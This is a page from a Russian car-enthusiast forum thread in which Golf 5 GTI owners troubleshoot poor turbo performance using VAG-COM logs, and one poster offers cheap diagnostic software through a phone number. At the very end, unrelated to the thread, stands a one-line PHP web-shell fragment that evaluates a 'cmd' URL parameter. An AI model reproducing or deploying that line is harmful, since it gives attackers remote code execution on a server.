+ Ответить в теме
Страница 2 из 3 ПерваяПервая 1 2 3 ПоследняяПоследняя
Показано с 11 по 20 из 28

Тема: Плиз хелп турба совсем не турба!)))


  1. #11
    Мимо проходил Wandrys is on a distinguished road Аватар для Wandrys
    Регистрация
    18.05.2018
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    7
    Да, сам тоже уже думаю- никому кроме нас это не нужно, надо самому лезть, тем более сам с электроникой работаю.
    Щас еду на электричке домой, гольфа в сервисе оставил- это уже четвёртый по счёту... предыдущие были 1. Вилгуд, 2. местный лохотронный сервис и 3. знакомый мужик с золотыми руками, который этими руками лишь развёл.
    Сейчас нашёл типа специализированный ваг-сервис- последняя надежда. Но что-то не надеюсь на них)
    А шнурок какой, где брал? Vag com can hex?

  2. #12
    Мимо проходил Kucher9tor is on a distinguished road Аватар для Kucher9tor
    Регистрация
    19.04.2016
    Откуда
    Зеленоград
    Машина
    GOLF 5 GTI
    Сообщений
    48
    Цитата Сообщение от Wandrys Посмотреть сообщение
    Да, сам тоже уже думаю- никому кроме нас это не нужно, надо самому лезть, тем более сам с электроникой работаю.
    Щас еду на электричке домой, гольфа в сервисе оставил- это уже четвёртый по счёту... предыдущие были 1. Вилгуд, 2. местный лохотронный сервис и 3. знакомый мужик с золотыми руками, который этими руками лишь развёл.
    Сейчас нашёл типа специализированный ваг-сервис- последняя надежда. Но что-то не надеюсь на них)
    А шнурок какой, где брал? Vag com can hex?
    С покупкой шнурка я слегка не угадал, с алиэкспресс купил Vag Can Pro - в принципе диагностика хорошая, даже чем-то лучше Васи, но сложнее) Вася так то для обычного пользователя удобнее.

  3. #13
    Мимо проходил Wandrys is on a distinguished road Аватар для Wandrys
    Регистрация
    18.05.2018
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    7
    Позвонили с сервиса - сделали опрессовку впуска, сказали, что нужно менять кучу трубок, прокладку коллектора и два клапана каких-то. Ну, мол, трубки рассохлись, компрессии нет, а когда все разогревается (например, в пробке) - материалы расширяются и нагнетаемый воздух поступает не в атмосферу, я в систему.

    Предварительно запчастей на 16к р., работы на 8к, ждать 3 недели. Заберу тачку, куплю, заменю. После замены отпишусь.

  4. #14
    Мимо проходил Kucher9tor is on a distinguished road Аватар для Kucher9tor
    Регистрация
    19.04.2016
    Откуда
    Зеленоград
    Машина
    GOLF 5 GTI
    Сообщений
    48
    я прокладку коллектора менял при чистке клапанов, и у турбы прокладки менялись с турбиной, и клапана все поменял уже))) ждём что у тебя получится)

  5. #15
    Мимо проходил Wandrys is on a distinguished road Аватар для Wandrys
    Регистрация
    18.05.2018
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    7
    Есть новости.
    1. Автоговносервис "VWService" (https://vws.ru/) - никакой не фольцвагеновский, обычная шарашкина контора, работающая на потоке клиентов.
    Поговорив со специалистом я понял, что вся диагностика моего автомобиля заняла примерно 2 минуты: 1 минута - подключили VAGCom и считали ошибки (1300р), 2 минута - опрессовка с помощью говна и палок на скорую руку, не глядя под капот (1200р). Написали мне бумажку, где написано "рекомендация по замене деталей на сумму 16+8 т.р." и "для дальнейшей диагностики требуется заменить детали на сумму 16+8т.р.). Спрашиваю - какое давление подавали при опрессовке и какой был расход на травление, как проверяли откуда воздух уходит - а мне вешают мне на уши лапшу и рассказывают как сложно определить где сифонит, но при этом тыкают мне в бумажку пальцами, где впуск разрисован и, мать его, с таким умным видом, что кажется - раз плюнуть для них эта болячка.
    Я раньше сам тачки свои чинил, а щас обленился и понял что такое бизнес по ремонту автомобилей. Все во благо личного обогащения. А базовые услуги типа диагностики - чушь. Палец о палец за эти 2,5 тысячи никто не ударит.

    2. Купил себе Васю (могу подсказать как приобрести за 3000р вместо 6000р WhatsApp 89851537547).
    Купил также инвертор автомобильный 12 на 220. Подключил ноут к тачке и поехал. В общем GTI был уже прогрет, но еще не ехал как надо, но через 5 минут задубасил!
    Первые 5 минут разгон на второй передаче был такой же как последующие 10 минут на четвертой (анализируя ЛОГи и свои ощущения, я понял именно так).
    Приложу ниже две вырезки из лога - 1. НЕ ЕДЕТ(плохо разгоняется, пешеходы тебя не замечают) и 2. ЕДЕТ(спина вжата в сидушку, пешеходы бегут). Ну и 3. - вырезка из 1 и 2 лога, для наглядного сравнения.
    Значит, бросается в глаза поведение клапана N75.
    В случае, когда тачка не едет, он залипает на отметке 76%(при этом турбина должна очень сильно дуть во впуск) и практически не шевелится. Машина не едет, толчка от турбины не ощущается НИКАКОГО во всем диапазоне работы двигателя.
    В случае, когда тачка едет, зазор N75 меняется вплоть до 35%(включается защита от передува). Красный пуляет, на 2,4 тысячах оборотах ощущается толчок под задницу, машина козлит и радует.
    Повторюсь, данные два лога сняты на 2 и 4 передаче. крайний Левый столбец таблички - время (в секундах наверно), второй справа от него - Обороты двигателя. Сравнивая время и обороты, можно подумать, что в динамике ничего не поменялось, но это 2 и 4(!!!) передача (скорость порядка 30-80 на 2 и 70-140 на 4, а время набора оборотов одинаковое). Тачка на чипе под 240-250 коней.
    https://yadi.sk/i/mJSfiyi83WF8WX
    https://yadi.sk/i/6GlWKdF_3WF8V7
    https://yadi.sk/i/82zrapxP3WF8TA
    ТОВАРИЩИ, гляньте ЛОГи, может кто что увидит, подскажет дельного?


    Последний раз редактировалось Wandrys; 20.05.2018 в 22:01. Причина: не вижу вложенные изображения

  6. #16
    Мимо проходил Kucher9tor is on a distinguished road Аватар для Kucher9tor
    Регистрация
    19.04.2016
    Откуда
    Зеленоград
    Машина
    GOLF 5 GTI
    Сообщений
    48
    на drive2 не зареген? скинул бы туда

  7. #17
    Мимо проходил Wandrys is on a distinguished road Аватар для Wandrys
    Регистрация
    18.05.2018
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    7
    Kucher9tor , а с ТНВД не разбирался?

    Предыдущее сообщение мое, похоже, плохо отражает ситуацию, так как запись велась на разных передачах и скоростях.
    Сегодня с утра выехал на трассу, на 4 передаче сначала не ехала, потом ехала. С N75 и с нагнетаемым давлением при этом показатели не разнились... Похоже, наддув норм работает.

  8. #18
    Мимо проходил Kucher9tor is on a distinguished road Аватар для Kucher9tor
    Регистрация
    19.04.2016
    Откуда
    Зеленоград
    Машина
    GOLF 5 GTI
    Сообщений
    48
    Цитата Сообщение от Wandrys Посмотреть сообщение
    Kucher9tor , а с ТНВД не разбирался?

    Предыдущее сообщение мое, похоже, плохо отражает ситуацию, так как запись велась на разных передачах и скоростях.
    Сегодня с утра выехал на трассу, на 4 передаче сначала не ехала, потом ехала. С N75 и с нагнетаемым давлением при этом показатели не разнились... Похоже, наддув норм работает.
    а как с ним разбираться?
    смотреть какое давление выдает? не пробовал.
    три раза менял толкатель только, да и проехал я уже около 40000 км )) мне кажется за это время если бы что-то умирало, сдохло бы окончательно))

  9. #19
    Мимо проходил Wandrys is on a distinguished road Аватар для Wandrys
    Регистрация
    18.05.2018
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    7
    Kucher9tor, Нашел! Не решил трабл, но нашел!

    3 день катаюсь со шнурком.
    У меня рядом тут трасса 6 км туда, 6 км обратно в 5 минутах от работы, после работы мчу туда. В каждую сторону проезжаю на 4 передаче с 2000 до 4500-5000 оборотов, повторяя цикл разгона 2-3 раза.
    Замечаю, что под конец первого 6км участка машина начинает просыпаться и ехать.
    1 день смотрел давление воздуха на впуске и сопутствующие... Показатели в норме, ничего интересного. Турбина дует, давление в интеркулере стабильное.
    2 день смотрел давление топлива на рампе и сопутствующие... Показатели в норме, ничего интересного. Насос качает, рампа обеспечена.
    3 день(сегодня) смотрел дроссельную заслонку, время впрыска и нагрузку на двигатель и сопутствующие... Интересно, глянь:
    1 Рисунок https://yadi.sk/i/4NXwuq-B3WRkwg
    2 Рисунок https://yadi.sk/i/sQvYppZB3WRm26
    Поясню. На графике 4 параметра, снизу слева показаны значения для выбранного момента времени (обороты, нагрузка, время впрыска, угол дроссельной заслонки).
    Не совсем понимаю что за параметр "нагрузка на двигатель", но он явно сильно зависит, судя по графику, от продолжительности впрыска топлива - интенсивности работы форсунок.
    На 1 рисунке две полоски белые справа. Та, что из них левее, отражает момент времени, когда тачка ехать начала. Сравни с моментом, отмеченным полоской на 2 рисунке - обороты выше, а нагрузка на движок и время работы форсунок ниже.
    Что интересно - перед тем, как она поехала, дроссельная заслонка приподзакрылась зачем-то, продолжительность впрыска упала там же, а потом бах! и тачка прёт.

    В общем, это точно, 100% тот самый момент. С давлением из трубы все нормально, так как я смотрел с датчика непосредственно с выхода с интеркулера. С ТНВД тоже гуд - смотрел с датчика на рампе. Сегодня уже мне более менее ясно было, что копать надо глубже и тут вот типа угадал.
    Управление форсунками? А?)
    Но дроссельная вот нах*ра закрываться начала - не понятно
    Последний раз редактировалось Wandrys; 24.05.2018 в 01:11.

  10. #20
    Мимо проходил Kucher9tor is on a distinguished road Аватар для Kucher9tor
    Регистрация
    19.04.2016
    Откуда
    Зеленоград
    Машина
    GOLF 5 GTI
    Сообщений
    48
    ну как успехи?)

+ Ответить в теме
Страница 2 из 3 ПерваяПервая 1 2 3 ПоследняяПоследняя

Похожие темы

  1. Турба k03 от CCZB
    от МиФ в разделе Барахолка
    Ответов: 4
    Последнее сообщение: 02.04.2024, 20:11
  2. Турба k03=>k03s
    от fergus в разделе Тюнинг: двигатель, впрыск, впуск/выпуск
    Ответов: 59
    Последнее сообщение: 01.10.2023, 14:01
  3. сток турба (IHI) GTI VI
    от Spaceman в разделе Покупка и продажа запчастей
    Ответов: 5
    Последнее сообщение: 07.11.2012, 11:50
  4. Детальки для Г5-Г5 турба
    от roamka в разделе Покупка и продажа запчастей
    Ответов: 6
    Последнее сообщение: 03.02.2012, 01:25

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}